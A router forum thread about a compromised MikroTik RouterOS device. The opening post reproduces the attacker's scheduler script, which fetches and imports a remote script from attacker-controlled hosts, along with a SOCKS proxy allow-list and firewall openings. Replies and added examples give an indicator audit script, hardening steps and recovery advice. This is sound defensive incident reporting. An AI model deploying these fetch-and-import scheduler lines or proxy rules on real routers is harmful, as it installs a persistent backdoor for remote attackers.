Mikrotik OS 6.45.6 Hacked

Just to share that yesterday we discovered one of our public-facing MikroTik routers had been hacked. We do not think the password leaked; it should have been via some vulnerability. Below are the details:

Model : Routerboard 3011UiAS (CloudCore)
OS version : 6.45.6
IP Services : Only Winbox is allowed from internal network range
What the hack did:

  1. Dropped 2 scripts on the file system
    name: 7wmp0b4s.rsc
    =================
    :do { /system scheduler set U3 name="U7" on-event="/tool fetch url=http://massgames.space/poll/5af76347-9571-47ef-8356-35454c1578e9 mode=http dst-path=7xe7zt46hb08\r\n/import 7xe7zt46hb08" } on-error={ :put "U3 not found"}
    :do { /system scheduler set U4 name="U7" on-event="/tool fetch url=http://massgames.space/poll/5af76347-9571-47ef-8356-35454c1578e9 mode=http dst-path=7xe7zt46hb08\r\n/import 7xe7zt46hb08" } on-error={ :put "U4 not found"}
    :do { /system scheduler set U5 name="U7" on-event="/tool fetch url=http://massgames.space/poll/5af76347-9571-47ef-8356-35454c1578e9 mode=http dst-path=7xe7zt46hb08\r\n/import 7xe7zt46hb08" } on-error={ :put "U5 not found"}
    :do { /system scheduler set U6 name="U7" on-event="/tool fetch url=http://massgames.space/poll/5af76347-9571-47ef-8356-35454c1578e9 mode=http dst-path=7xe7zt46hb08\r\n/import 7xe7zt46hb08" } on-error={ :put "U6 not found"}
    :do { /system scheduler set U7 name="U7" on-event="/tool fetch url=http://massgames.space/poll/5af76347-9571-47ef-8356-35454c1578e9 mode=http dst-path=7xe7zt46hb08\r\n/import 7xe7zt46hb08" } on-error={ :put "U7 not found"}

    name: 7xe7zt46hb08

/ip socks access add src-address=5.188.42.0/24 action=allow
/ip socks access add src-address=85.119.151.0/24 action=allow
/ip socks access add src-address=77.238.240.0/24 action=allow
/ip socks access add src-address=178.239.168.0/24 action=allow
/ip socks access add src-address=77.238.228.0/24 action=allow
/ip socks access add src-address=94.243.168.0/24 action=allow
/ip socks access add src-address=213.33.214.0/24 action=allow
/ip socks access add src-address=5.188.187.0/24 action=allow
/ip socks access add src-address=31.172.128.45/32 action=allow
/ip socks access add src-address=31.172.128.25/32 action=allow
/ip socks access add src-address=10.0.0.0/8 action=allow
/ip socks access add src-address=185.137.233.251/32 action=allow
/ip socks access add src-address=5.9.163.16/29 action=allow
/ip socks access add src-address=95.213.221.0/24 action=allow
/ip socks access add src-address=159.255.24.0/24 action=allow
/ip socks access add src-address=31.184.210.0/24 action=allow
/ip socks access add src-address=192.243.53.0/24 action=allow
/ip socks access add src-address=146.0.78.6/32 action=allow
/ip socks access add src-address=193.188.22.205/32 action=allow
/ip socks access add src-address=0.0.0.0/0 action=deny

  2. Set the scheduler to run the task every hour

  3. Added the following firewall rules:
    add action=accept chain=input dst-port=3349 protocol=tcp
    add action=accept chain=input dst-port=3349 protocol=tcp
    add action=accept chain=input dst-port=3349 protocol=tcp
    add action=accept chain=input dst-port=3349 protocol=tcp

Thank you.

Regards,
Josh
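As an added example (not part of Josh's post), a read-only RouterOS script that audits a router for the indicators listed above: scheduler tasks that fetch and import a remote script, files sitting on the file system, SOCKS proxy state and access rules, and input accept rules for TCP 3349. The port and patterns come from this thread; nothing is modified.

```routeros
# Added audit script: read-only triage for the indicators described in this thread.
# Paste into a RouterOS terminal or run it from /system script. Nothing is changed.
:local hits 0

# 1. Scheduler tasks whose on-event fetches and then imports a script (the U3..U7 pattern)
:foreach s in=[/system scheduler find where on-event~"fetch" && on-event~"import"] do={
    :put ("SUSPICIOUS scheduler: " . [/system scheduler get $s name] . " runs: " . [/system scheduler get $s on-event])
    :set hits ($hits + 1)
}

# 2. Every non-directory file: review for names you did not create (e.g. 7wmp0b4s.rsc, 7xe7zt46hb08)
:foreach f in=[/file find where type!="directory"] do={
    :put ("FILE: " . [/file get $f name] . " type=" . [/file get $f type] . " size=" . [/file get $f size])
}

# 3. SOCKS proxy: the dropped script built an allow-list of remote networks here
:if ([/ip socks get enabled] = true) do={
    :put "WARNING: SOCKS proxy is enabled"
    :set hits ($hits + 1)
}
:foreach a in=[/ip socks access find] do={
    :put ("SOCKS access rule: src=" . [/ip socks access get $a src-address] . " action=" . [/ip socks access get $a action])
    :set hits ($hits + 1)
}

# 4. Input accept rules for the TCP port the attacker opened (3349 in this thread)
:foreach r in=[/ip firewall filter find where chain="input" && action="accept" && dst-port="3349"] do={
    :put ("SUSPICIOUS firewall rule: input accept dst-port=" . [/ip firewall filter get $r dst-port] . " comment=" . [/ip firewall filter get $r comment])
    :set hits ($hits + 1)
}

:put ("Audit finished: " . $hits . " finding(s) besides the file listing")
```

Findings confirm a compromise but do not bound it; as later replies in this thread say, the recovery is a Netinstall with format rather than cleaning up in place.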

When was the last time you changed the password? Is it possible that it has not been changed since your router was running RouterOS v6.42 or an older version?

Like Strods wrote! This is an old script from an old version of ROS. Also, do you use a master password for Winbox? If not, then you should know that if you export addresses.wbx, this is an unencrypted file that can be opened with Notepad to read all the IPs/usernames/passwords saved there!

Hey, I also got something similar here; my ROS is 6.45.9 (long-term).

Screenshot_6.jpg


/tool fetch url=http://spacewb.tech/poll/c59e2b64-8b65-46ed-bcbf-b8ba4c68bd49 mode=http dst-path=7wmp0b4s.rsc
/import 7wmp0b4s.rsc

Right now my router has been reflashed with Netinstall.

What do you mean "the same experience"?? That is not the same, it is something completely different!
It is the result of a bug in RouterOS which is triggered by renaming the wireless interface.

I guess you all had the router open for remote access using Winbox, SSH, Telnet or web access.
Winbox was hacked some time back and this is fixed in later versions. (Lots of scanning was done against the Winbox port 8291, so item 2 in the list below would have helped.)

VPN is the best option for remote access to the router.

If VPN can not be used, then follow this:

  1. Use another port than the default.
  2. Use port knocking. This prevents someone from seeing open ports.
  3. Use a long and good password.
  4. Use an access list to prevent random Internet hosts from accessing your router.
  5. Log everything. (See my signature for an example.)
  6. Upgrade firmware to the latest stable release.
  7. ++++
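An added RouterOS configuration (not from this thread or any of its posters) that applies items 1 to 6 above on a router that cannot use a VPN: a non-default Winbox port, a two-stage port knock, an admin address list, logging of dropped input traffic, SOCKS disabled. The admin network 192.168.88.0/24, Winbox port 58291, knock ports 7001/7002 and WAN interface ether1 are placeholder assumptions, and it assumes an empty input chain (e.g. right after Netinstall); the password and upgrade steps are left as comments to run interactively.

```routeros
# Added hardening example. Placeholders: admin LAN 192.168.88.0/24, WAN on ether1,
# Winbox moved to TCP 58291, knock sequence TCP 7001 then TCP 7002. Adjust before use.
# Rules are appended in order; on a router with existing input rules use place-before=.

# 1. Non-default Winbox port; management services you do not use switched off
/ip service set winbox port=58291
/ip service set ssh address=192.168.88.0/24
/ip service disable telnet,ftp,www,api,api-ssl

# Close the SOCKS proxy the dropped script in this thread relied on
/ip socks set enabled=no
/ip socks access remove [find]

# 4. Access list: only these hosts reach the router without knocking
/ip firewall address-list add list=admin address=192.168.88.0/24 comment="admin workstations"

/ip firewall filter add chain=input connection-state=established,related action=accept comment="established"
/ip firewall filter add chain=input connection-state=invalid action=drop comment="invalid"
/ip firewall filter add chain=input src-address-list=admin action=accept comment="admin LAN"

# 2. Port knocking: stage 1 marks the source for 15s, stage 2 within that window grants 10 minutes.
#    add-src-to-address-list does not accept the packet, so the knock ports themselves stay closed.
/ip firewall filter add chain=input protocol=tcp dst-port=7001 action=add-src-to-address-list address-list=knock-stage1 address-list-timeout=15s comment="knock stage 1"
/ip firewall filter add chain=input protocol=tcp dst-port=7002 src-address-list=knock-stage1 action=add-src-to-address-list address-list=knock-ok address-list-timeout=10m comment="knock stage 2"
/ip firewall filter add chain=input protocol=tcp dst-port=58291 src-address-list=knock-ok action=accept comment="Winbox after knock"

# Nobody else reaches Winbox, and nothing else from the WAN reaches the router at all
/ip firewall filter add chain=input protocol=tcp dst-port=58291 action=drop comment="Winbox only via admin list or knock"
/ip firewall filter add chain=input in-interface=ether1 action=drop log=yes log-prefix="INPUT-DROP" comment="drop and log the rest from WAN"

# 5. Keep firewall log lines in memory (review with /log print where topics~"firewall")
/system logging add topics=firewall action=memory

# 3. Password: run interactively, never reuse the pre-compromise one
#    /user set admin password="<long random passphrase>"
# 6. Updates: /system package update set channel=long-term ; /system package update check-for-updates
```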

Sorry, my bad wording. Let me correct it: "similar case". I just want to share what happened on my router last day, and I found this thread by searching for "7wmp0b4s.rsc".
Before the attack happened I had already set only the Winbox service enabled, with a random port and local IP, and a filter rule dropping port scanners.

Now you have edited the post and added that part (where from?) with tool fetch.
I think originally there was only the screenshot with the environment variables and THAT is not a sign the router was hacked, it is the result of a RouterOS bug.
When you have done some things a developer did not expect you to do (e.g. renamed wlan1 to something else, or removed the wireless package), a conversion script run after the upgrade failed halfway and left all that crap in the environment.

I would like to apologize for my mistake. I just wanted to share, that's all.
Okay, so the environment is from the wlan interface.

I don't know how they got into the router, but they left the config like this.

I'll give screenshots from the log:

Screenshot_5.jpg
Screenshot_7.jpg
Screenshot_8.jpg

Sorry for troubling you.

Ok that is the full info you should have given in your first post.
I presume it is still present in your router?
You need to netinstall it with format, and NOT restore a backup.
So best is to do a clean configuration.
At most you can do a /export before you wipe it and keep it as a guide to remember what you need to configure.

To the OP, you need to download a recent stable version of the software (long-term versions are usually good), and then use the Netinstall process to get the router back to a clean state.
Do not open the router to the Internet on the input chain and do not reuse any old passwords for the admin.
Also limit admin access to the router itself (input chain) to specific LAN IPs (namely the admin's devices).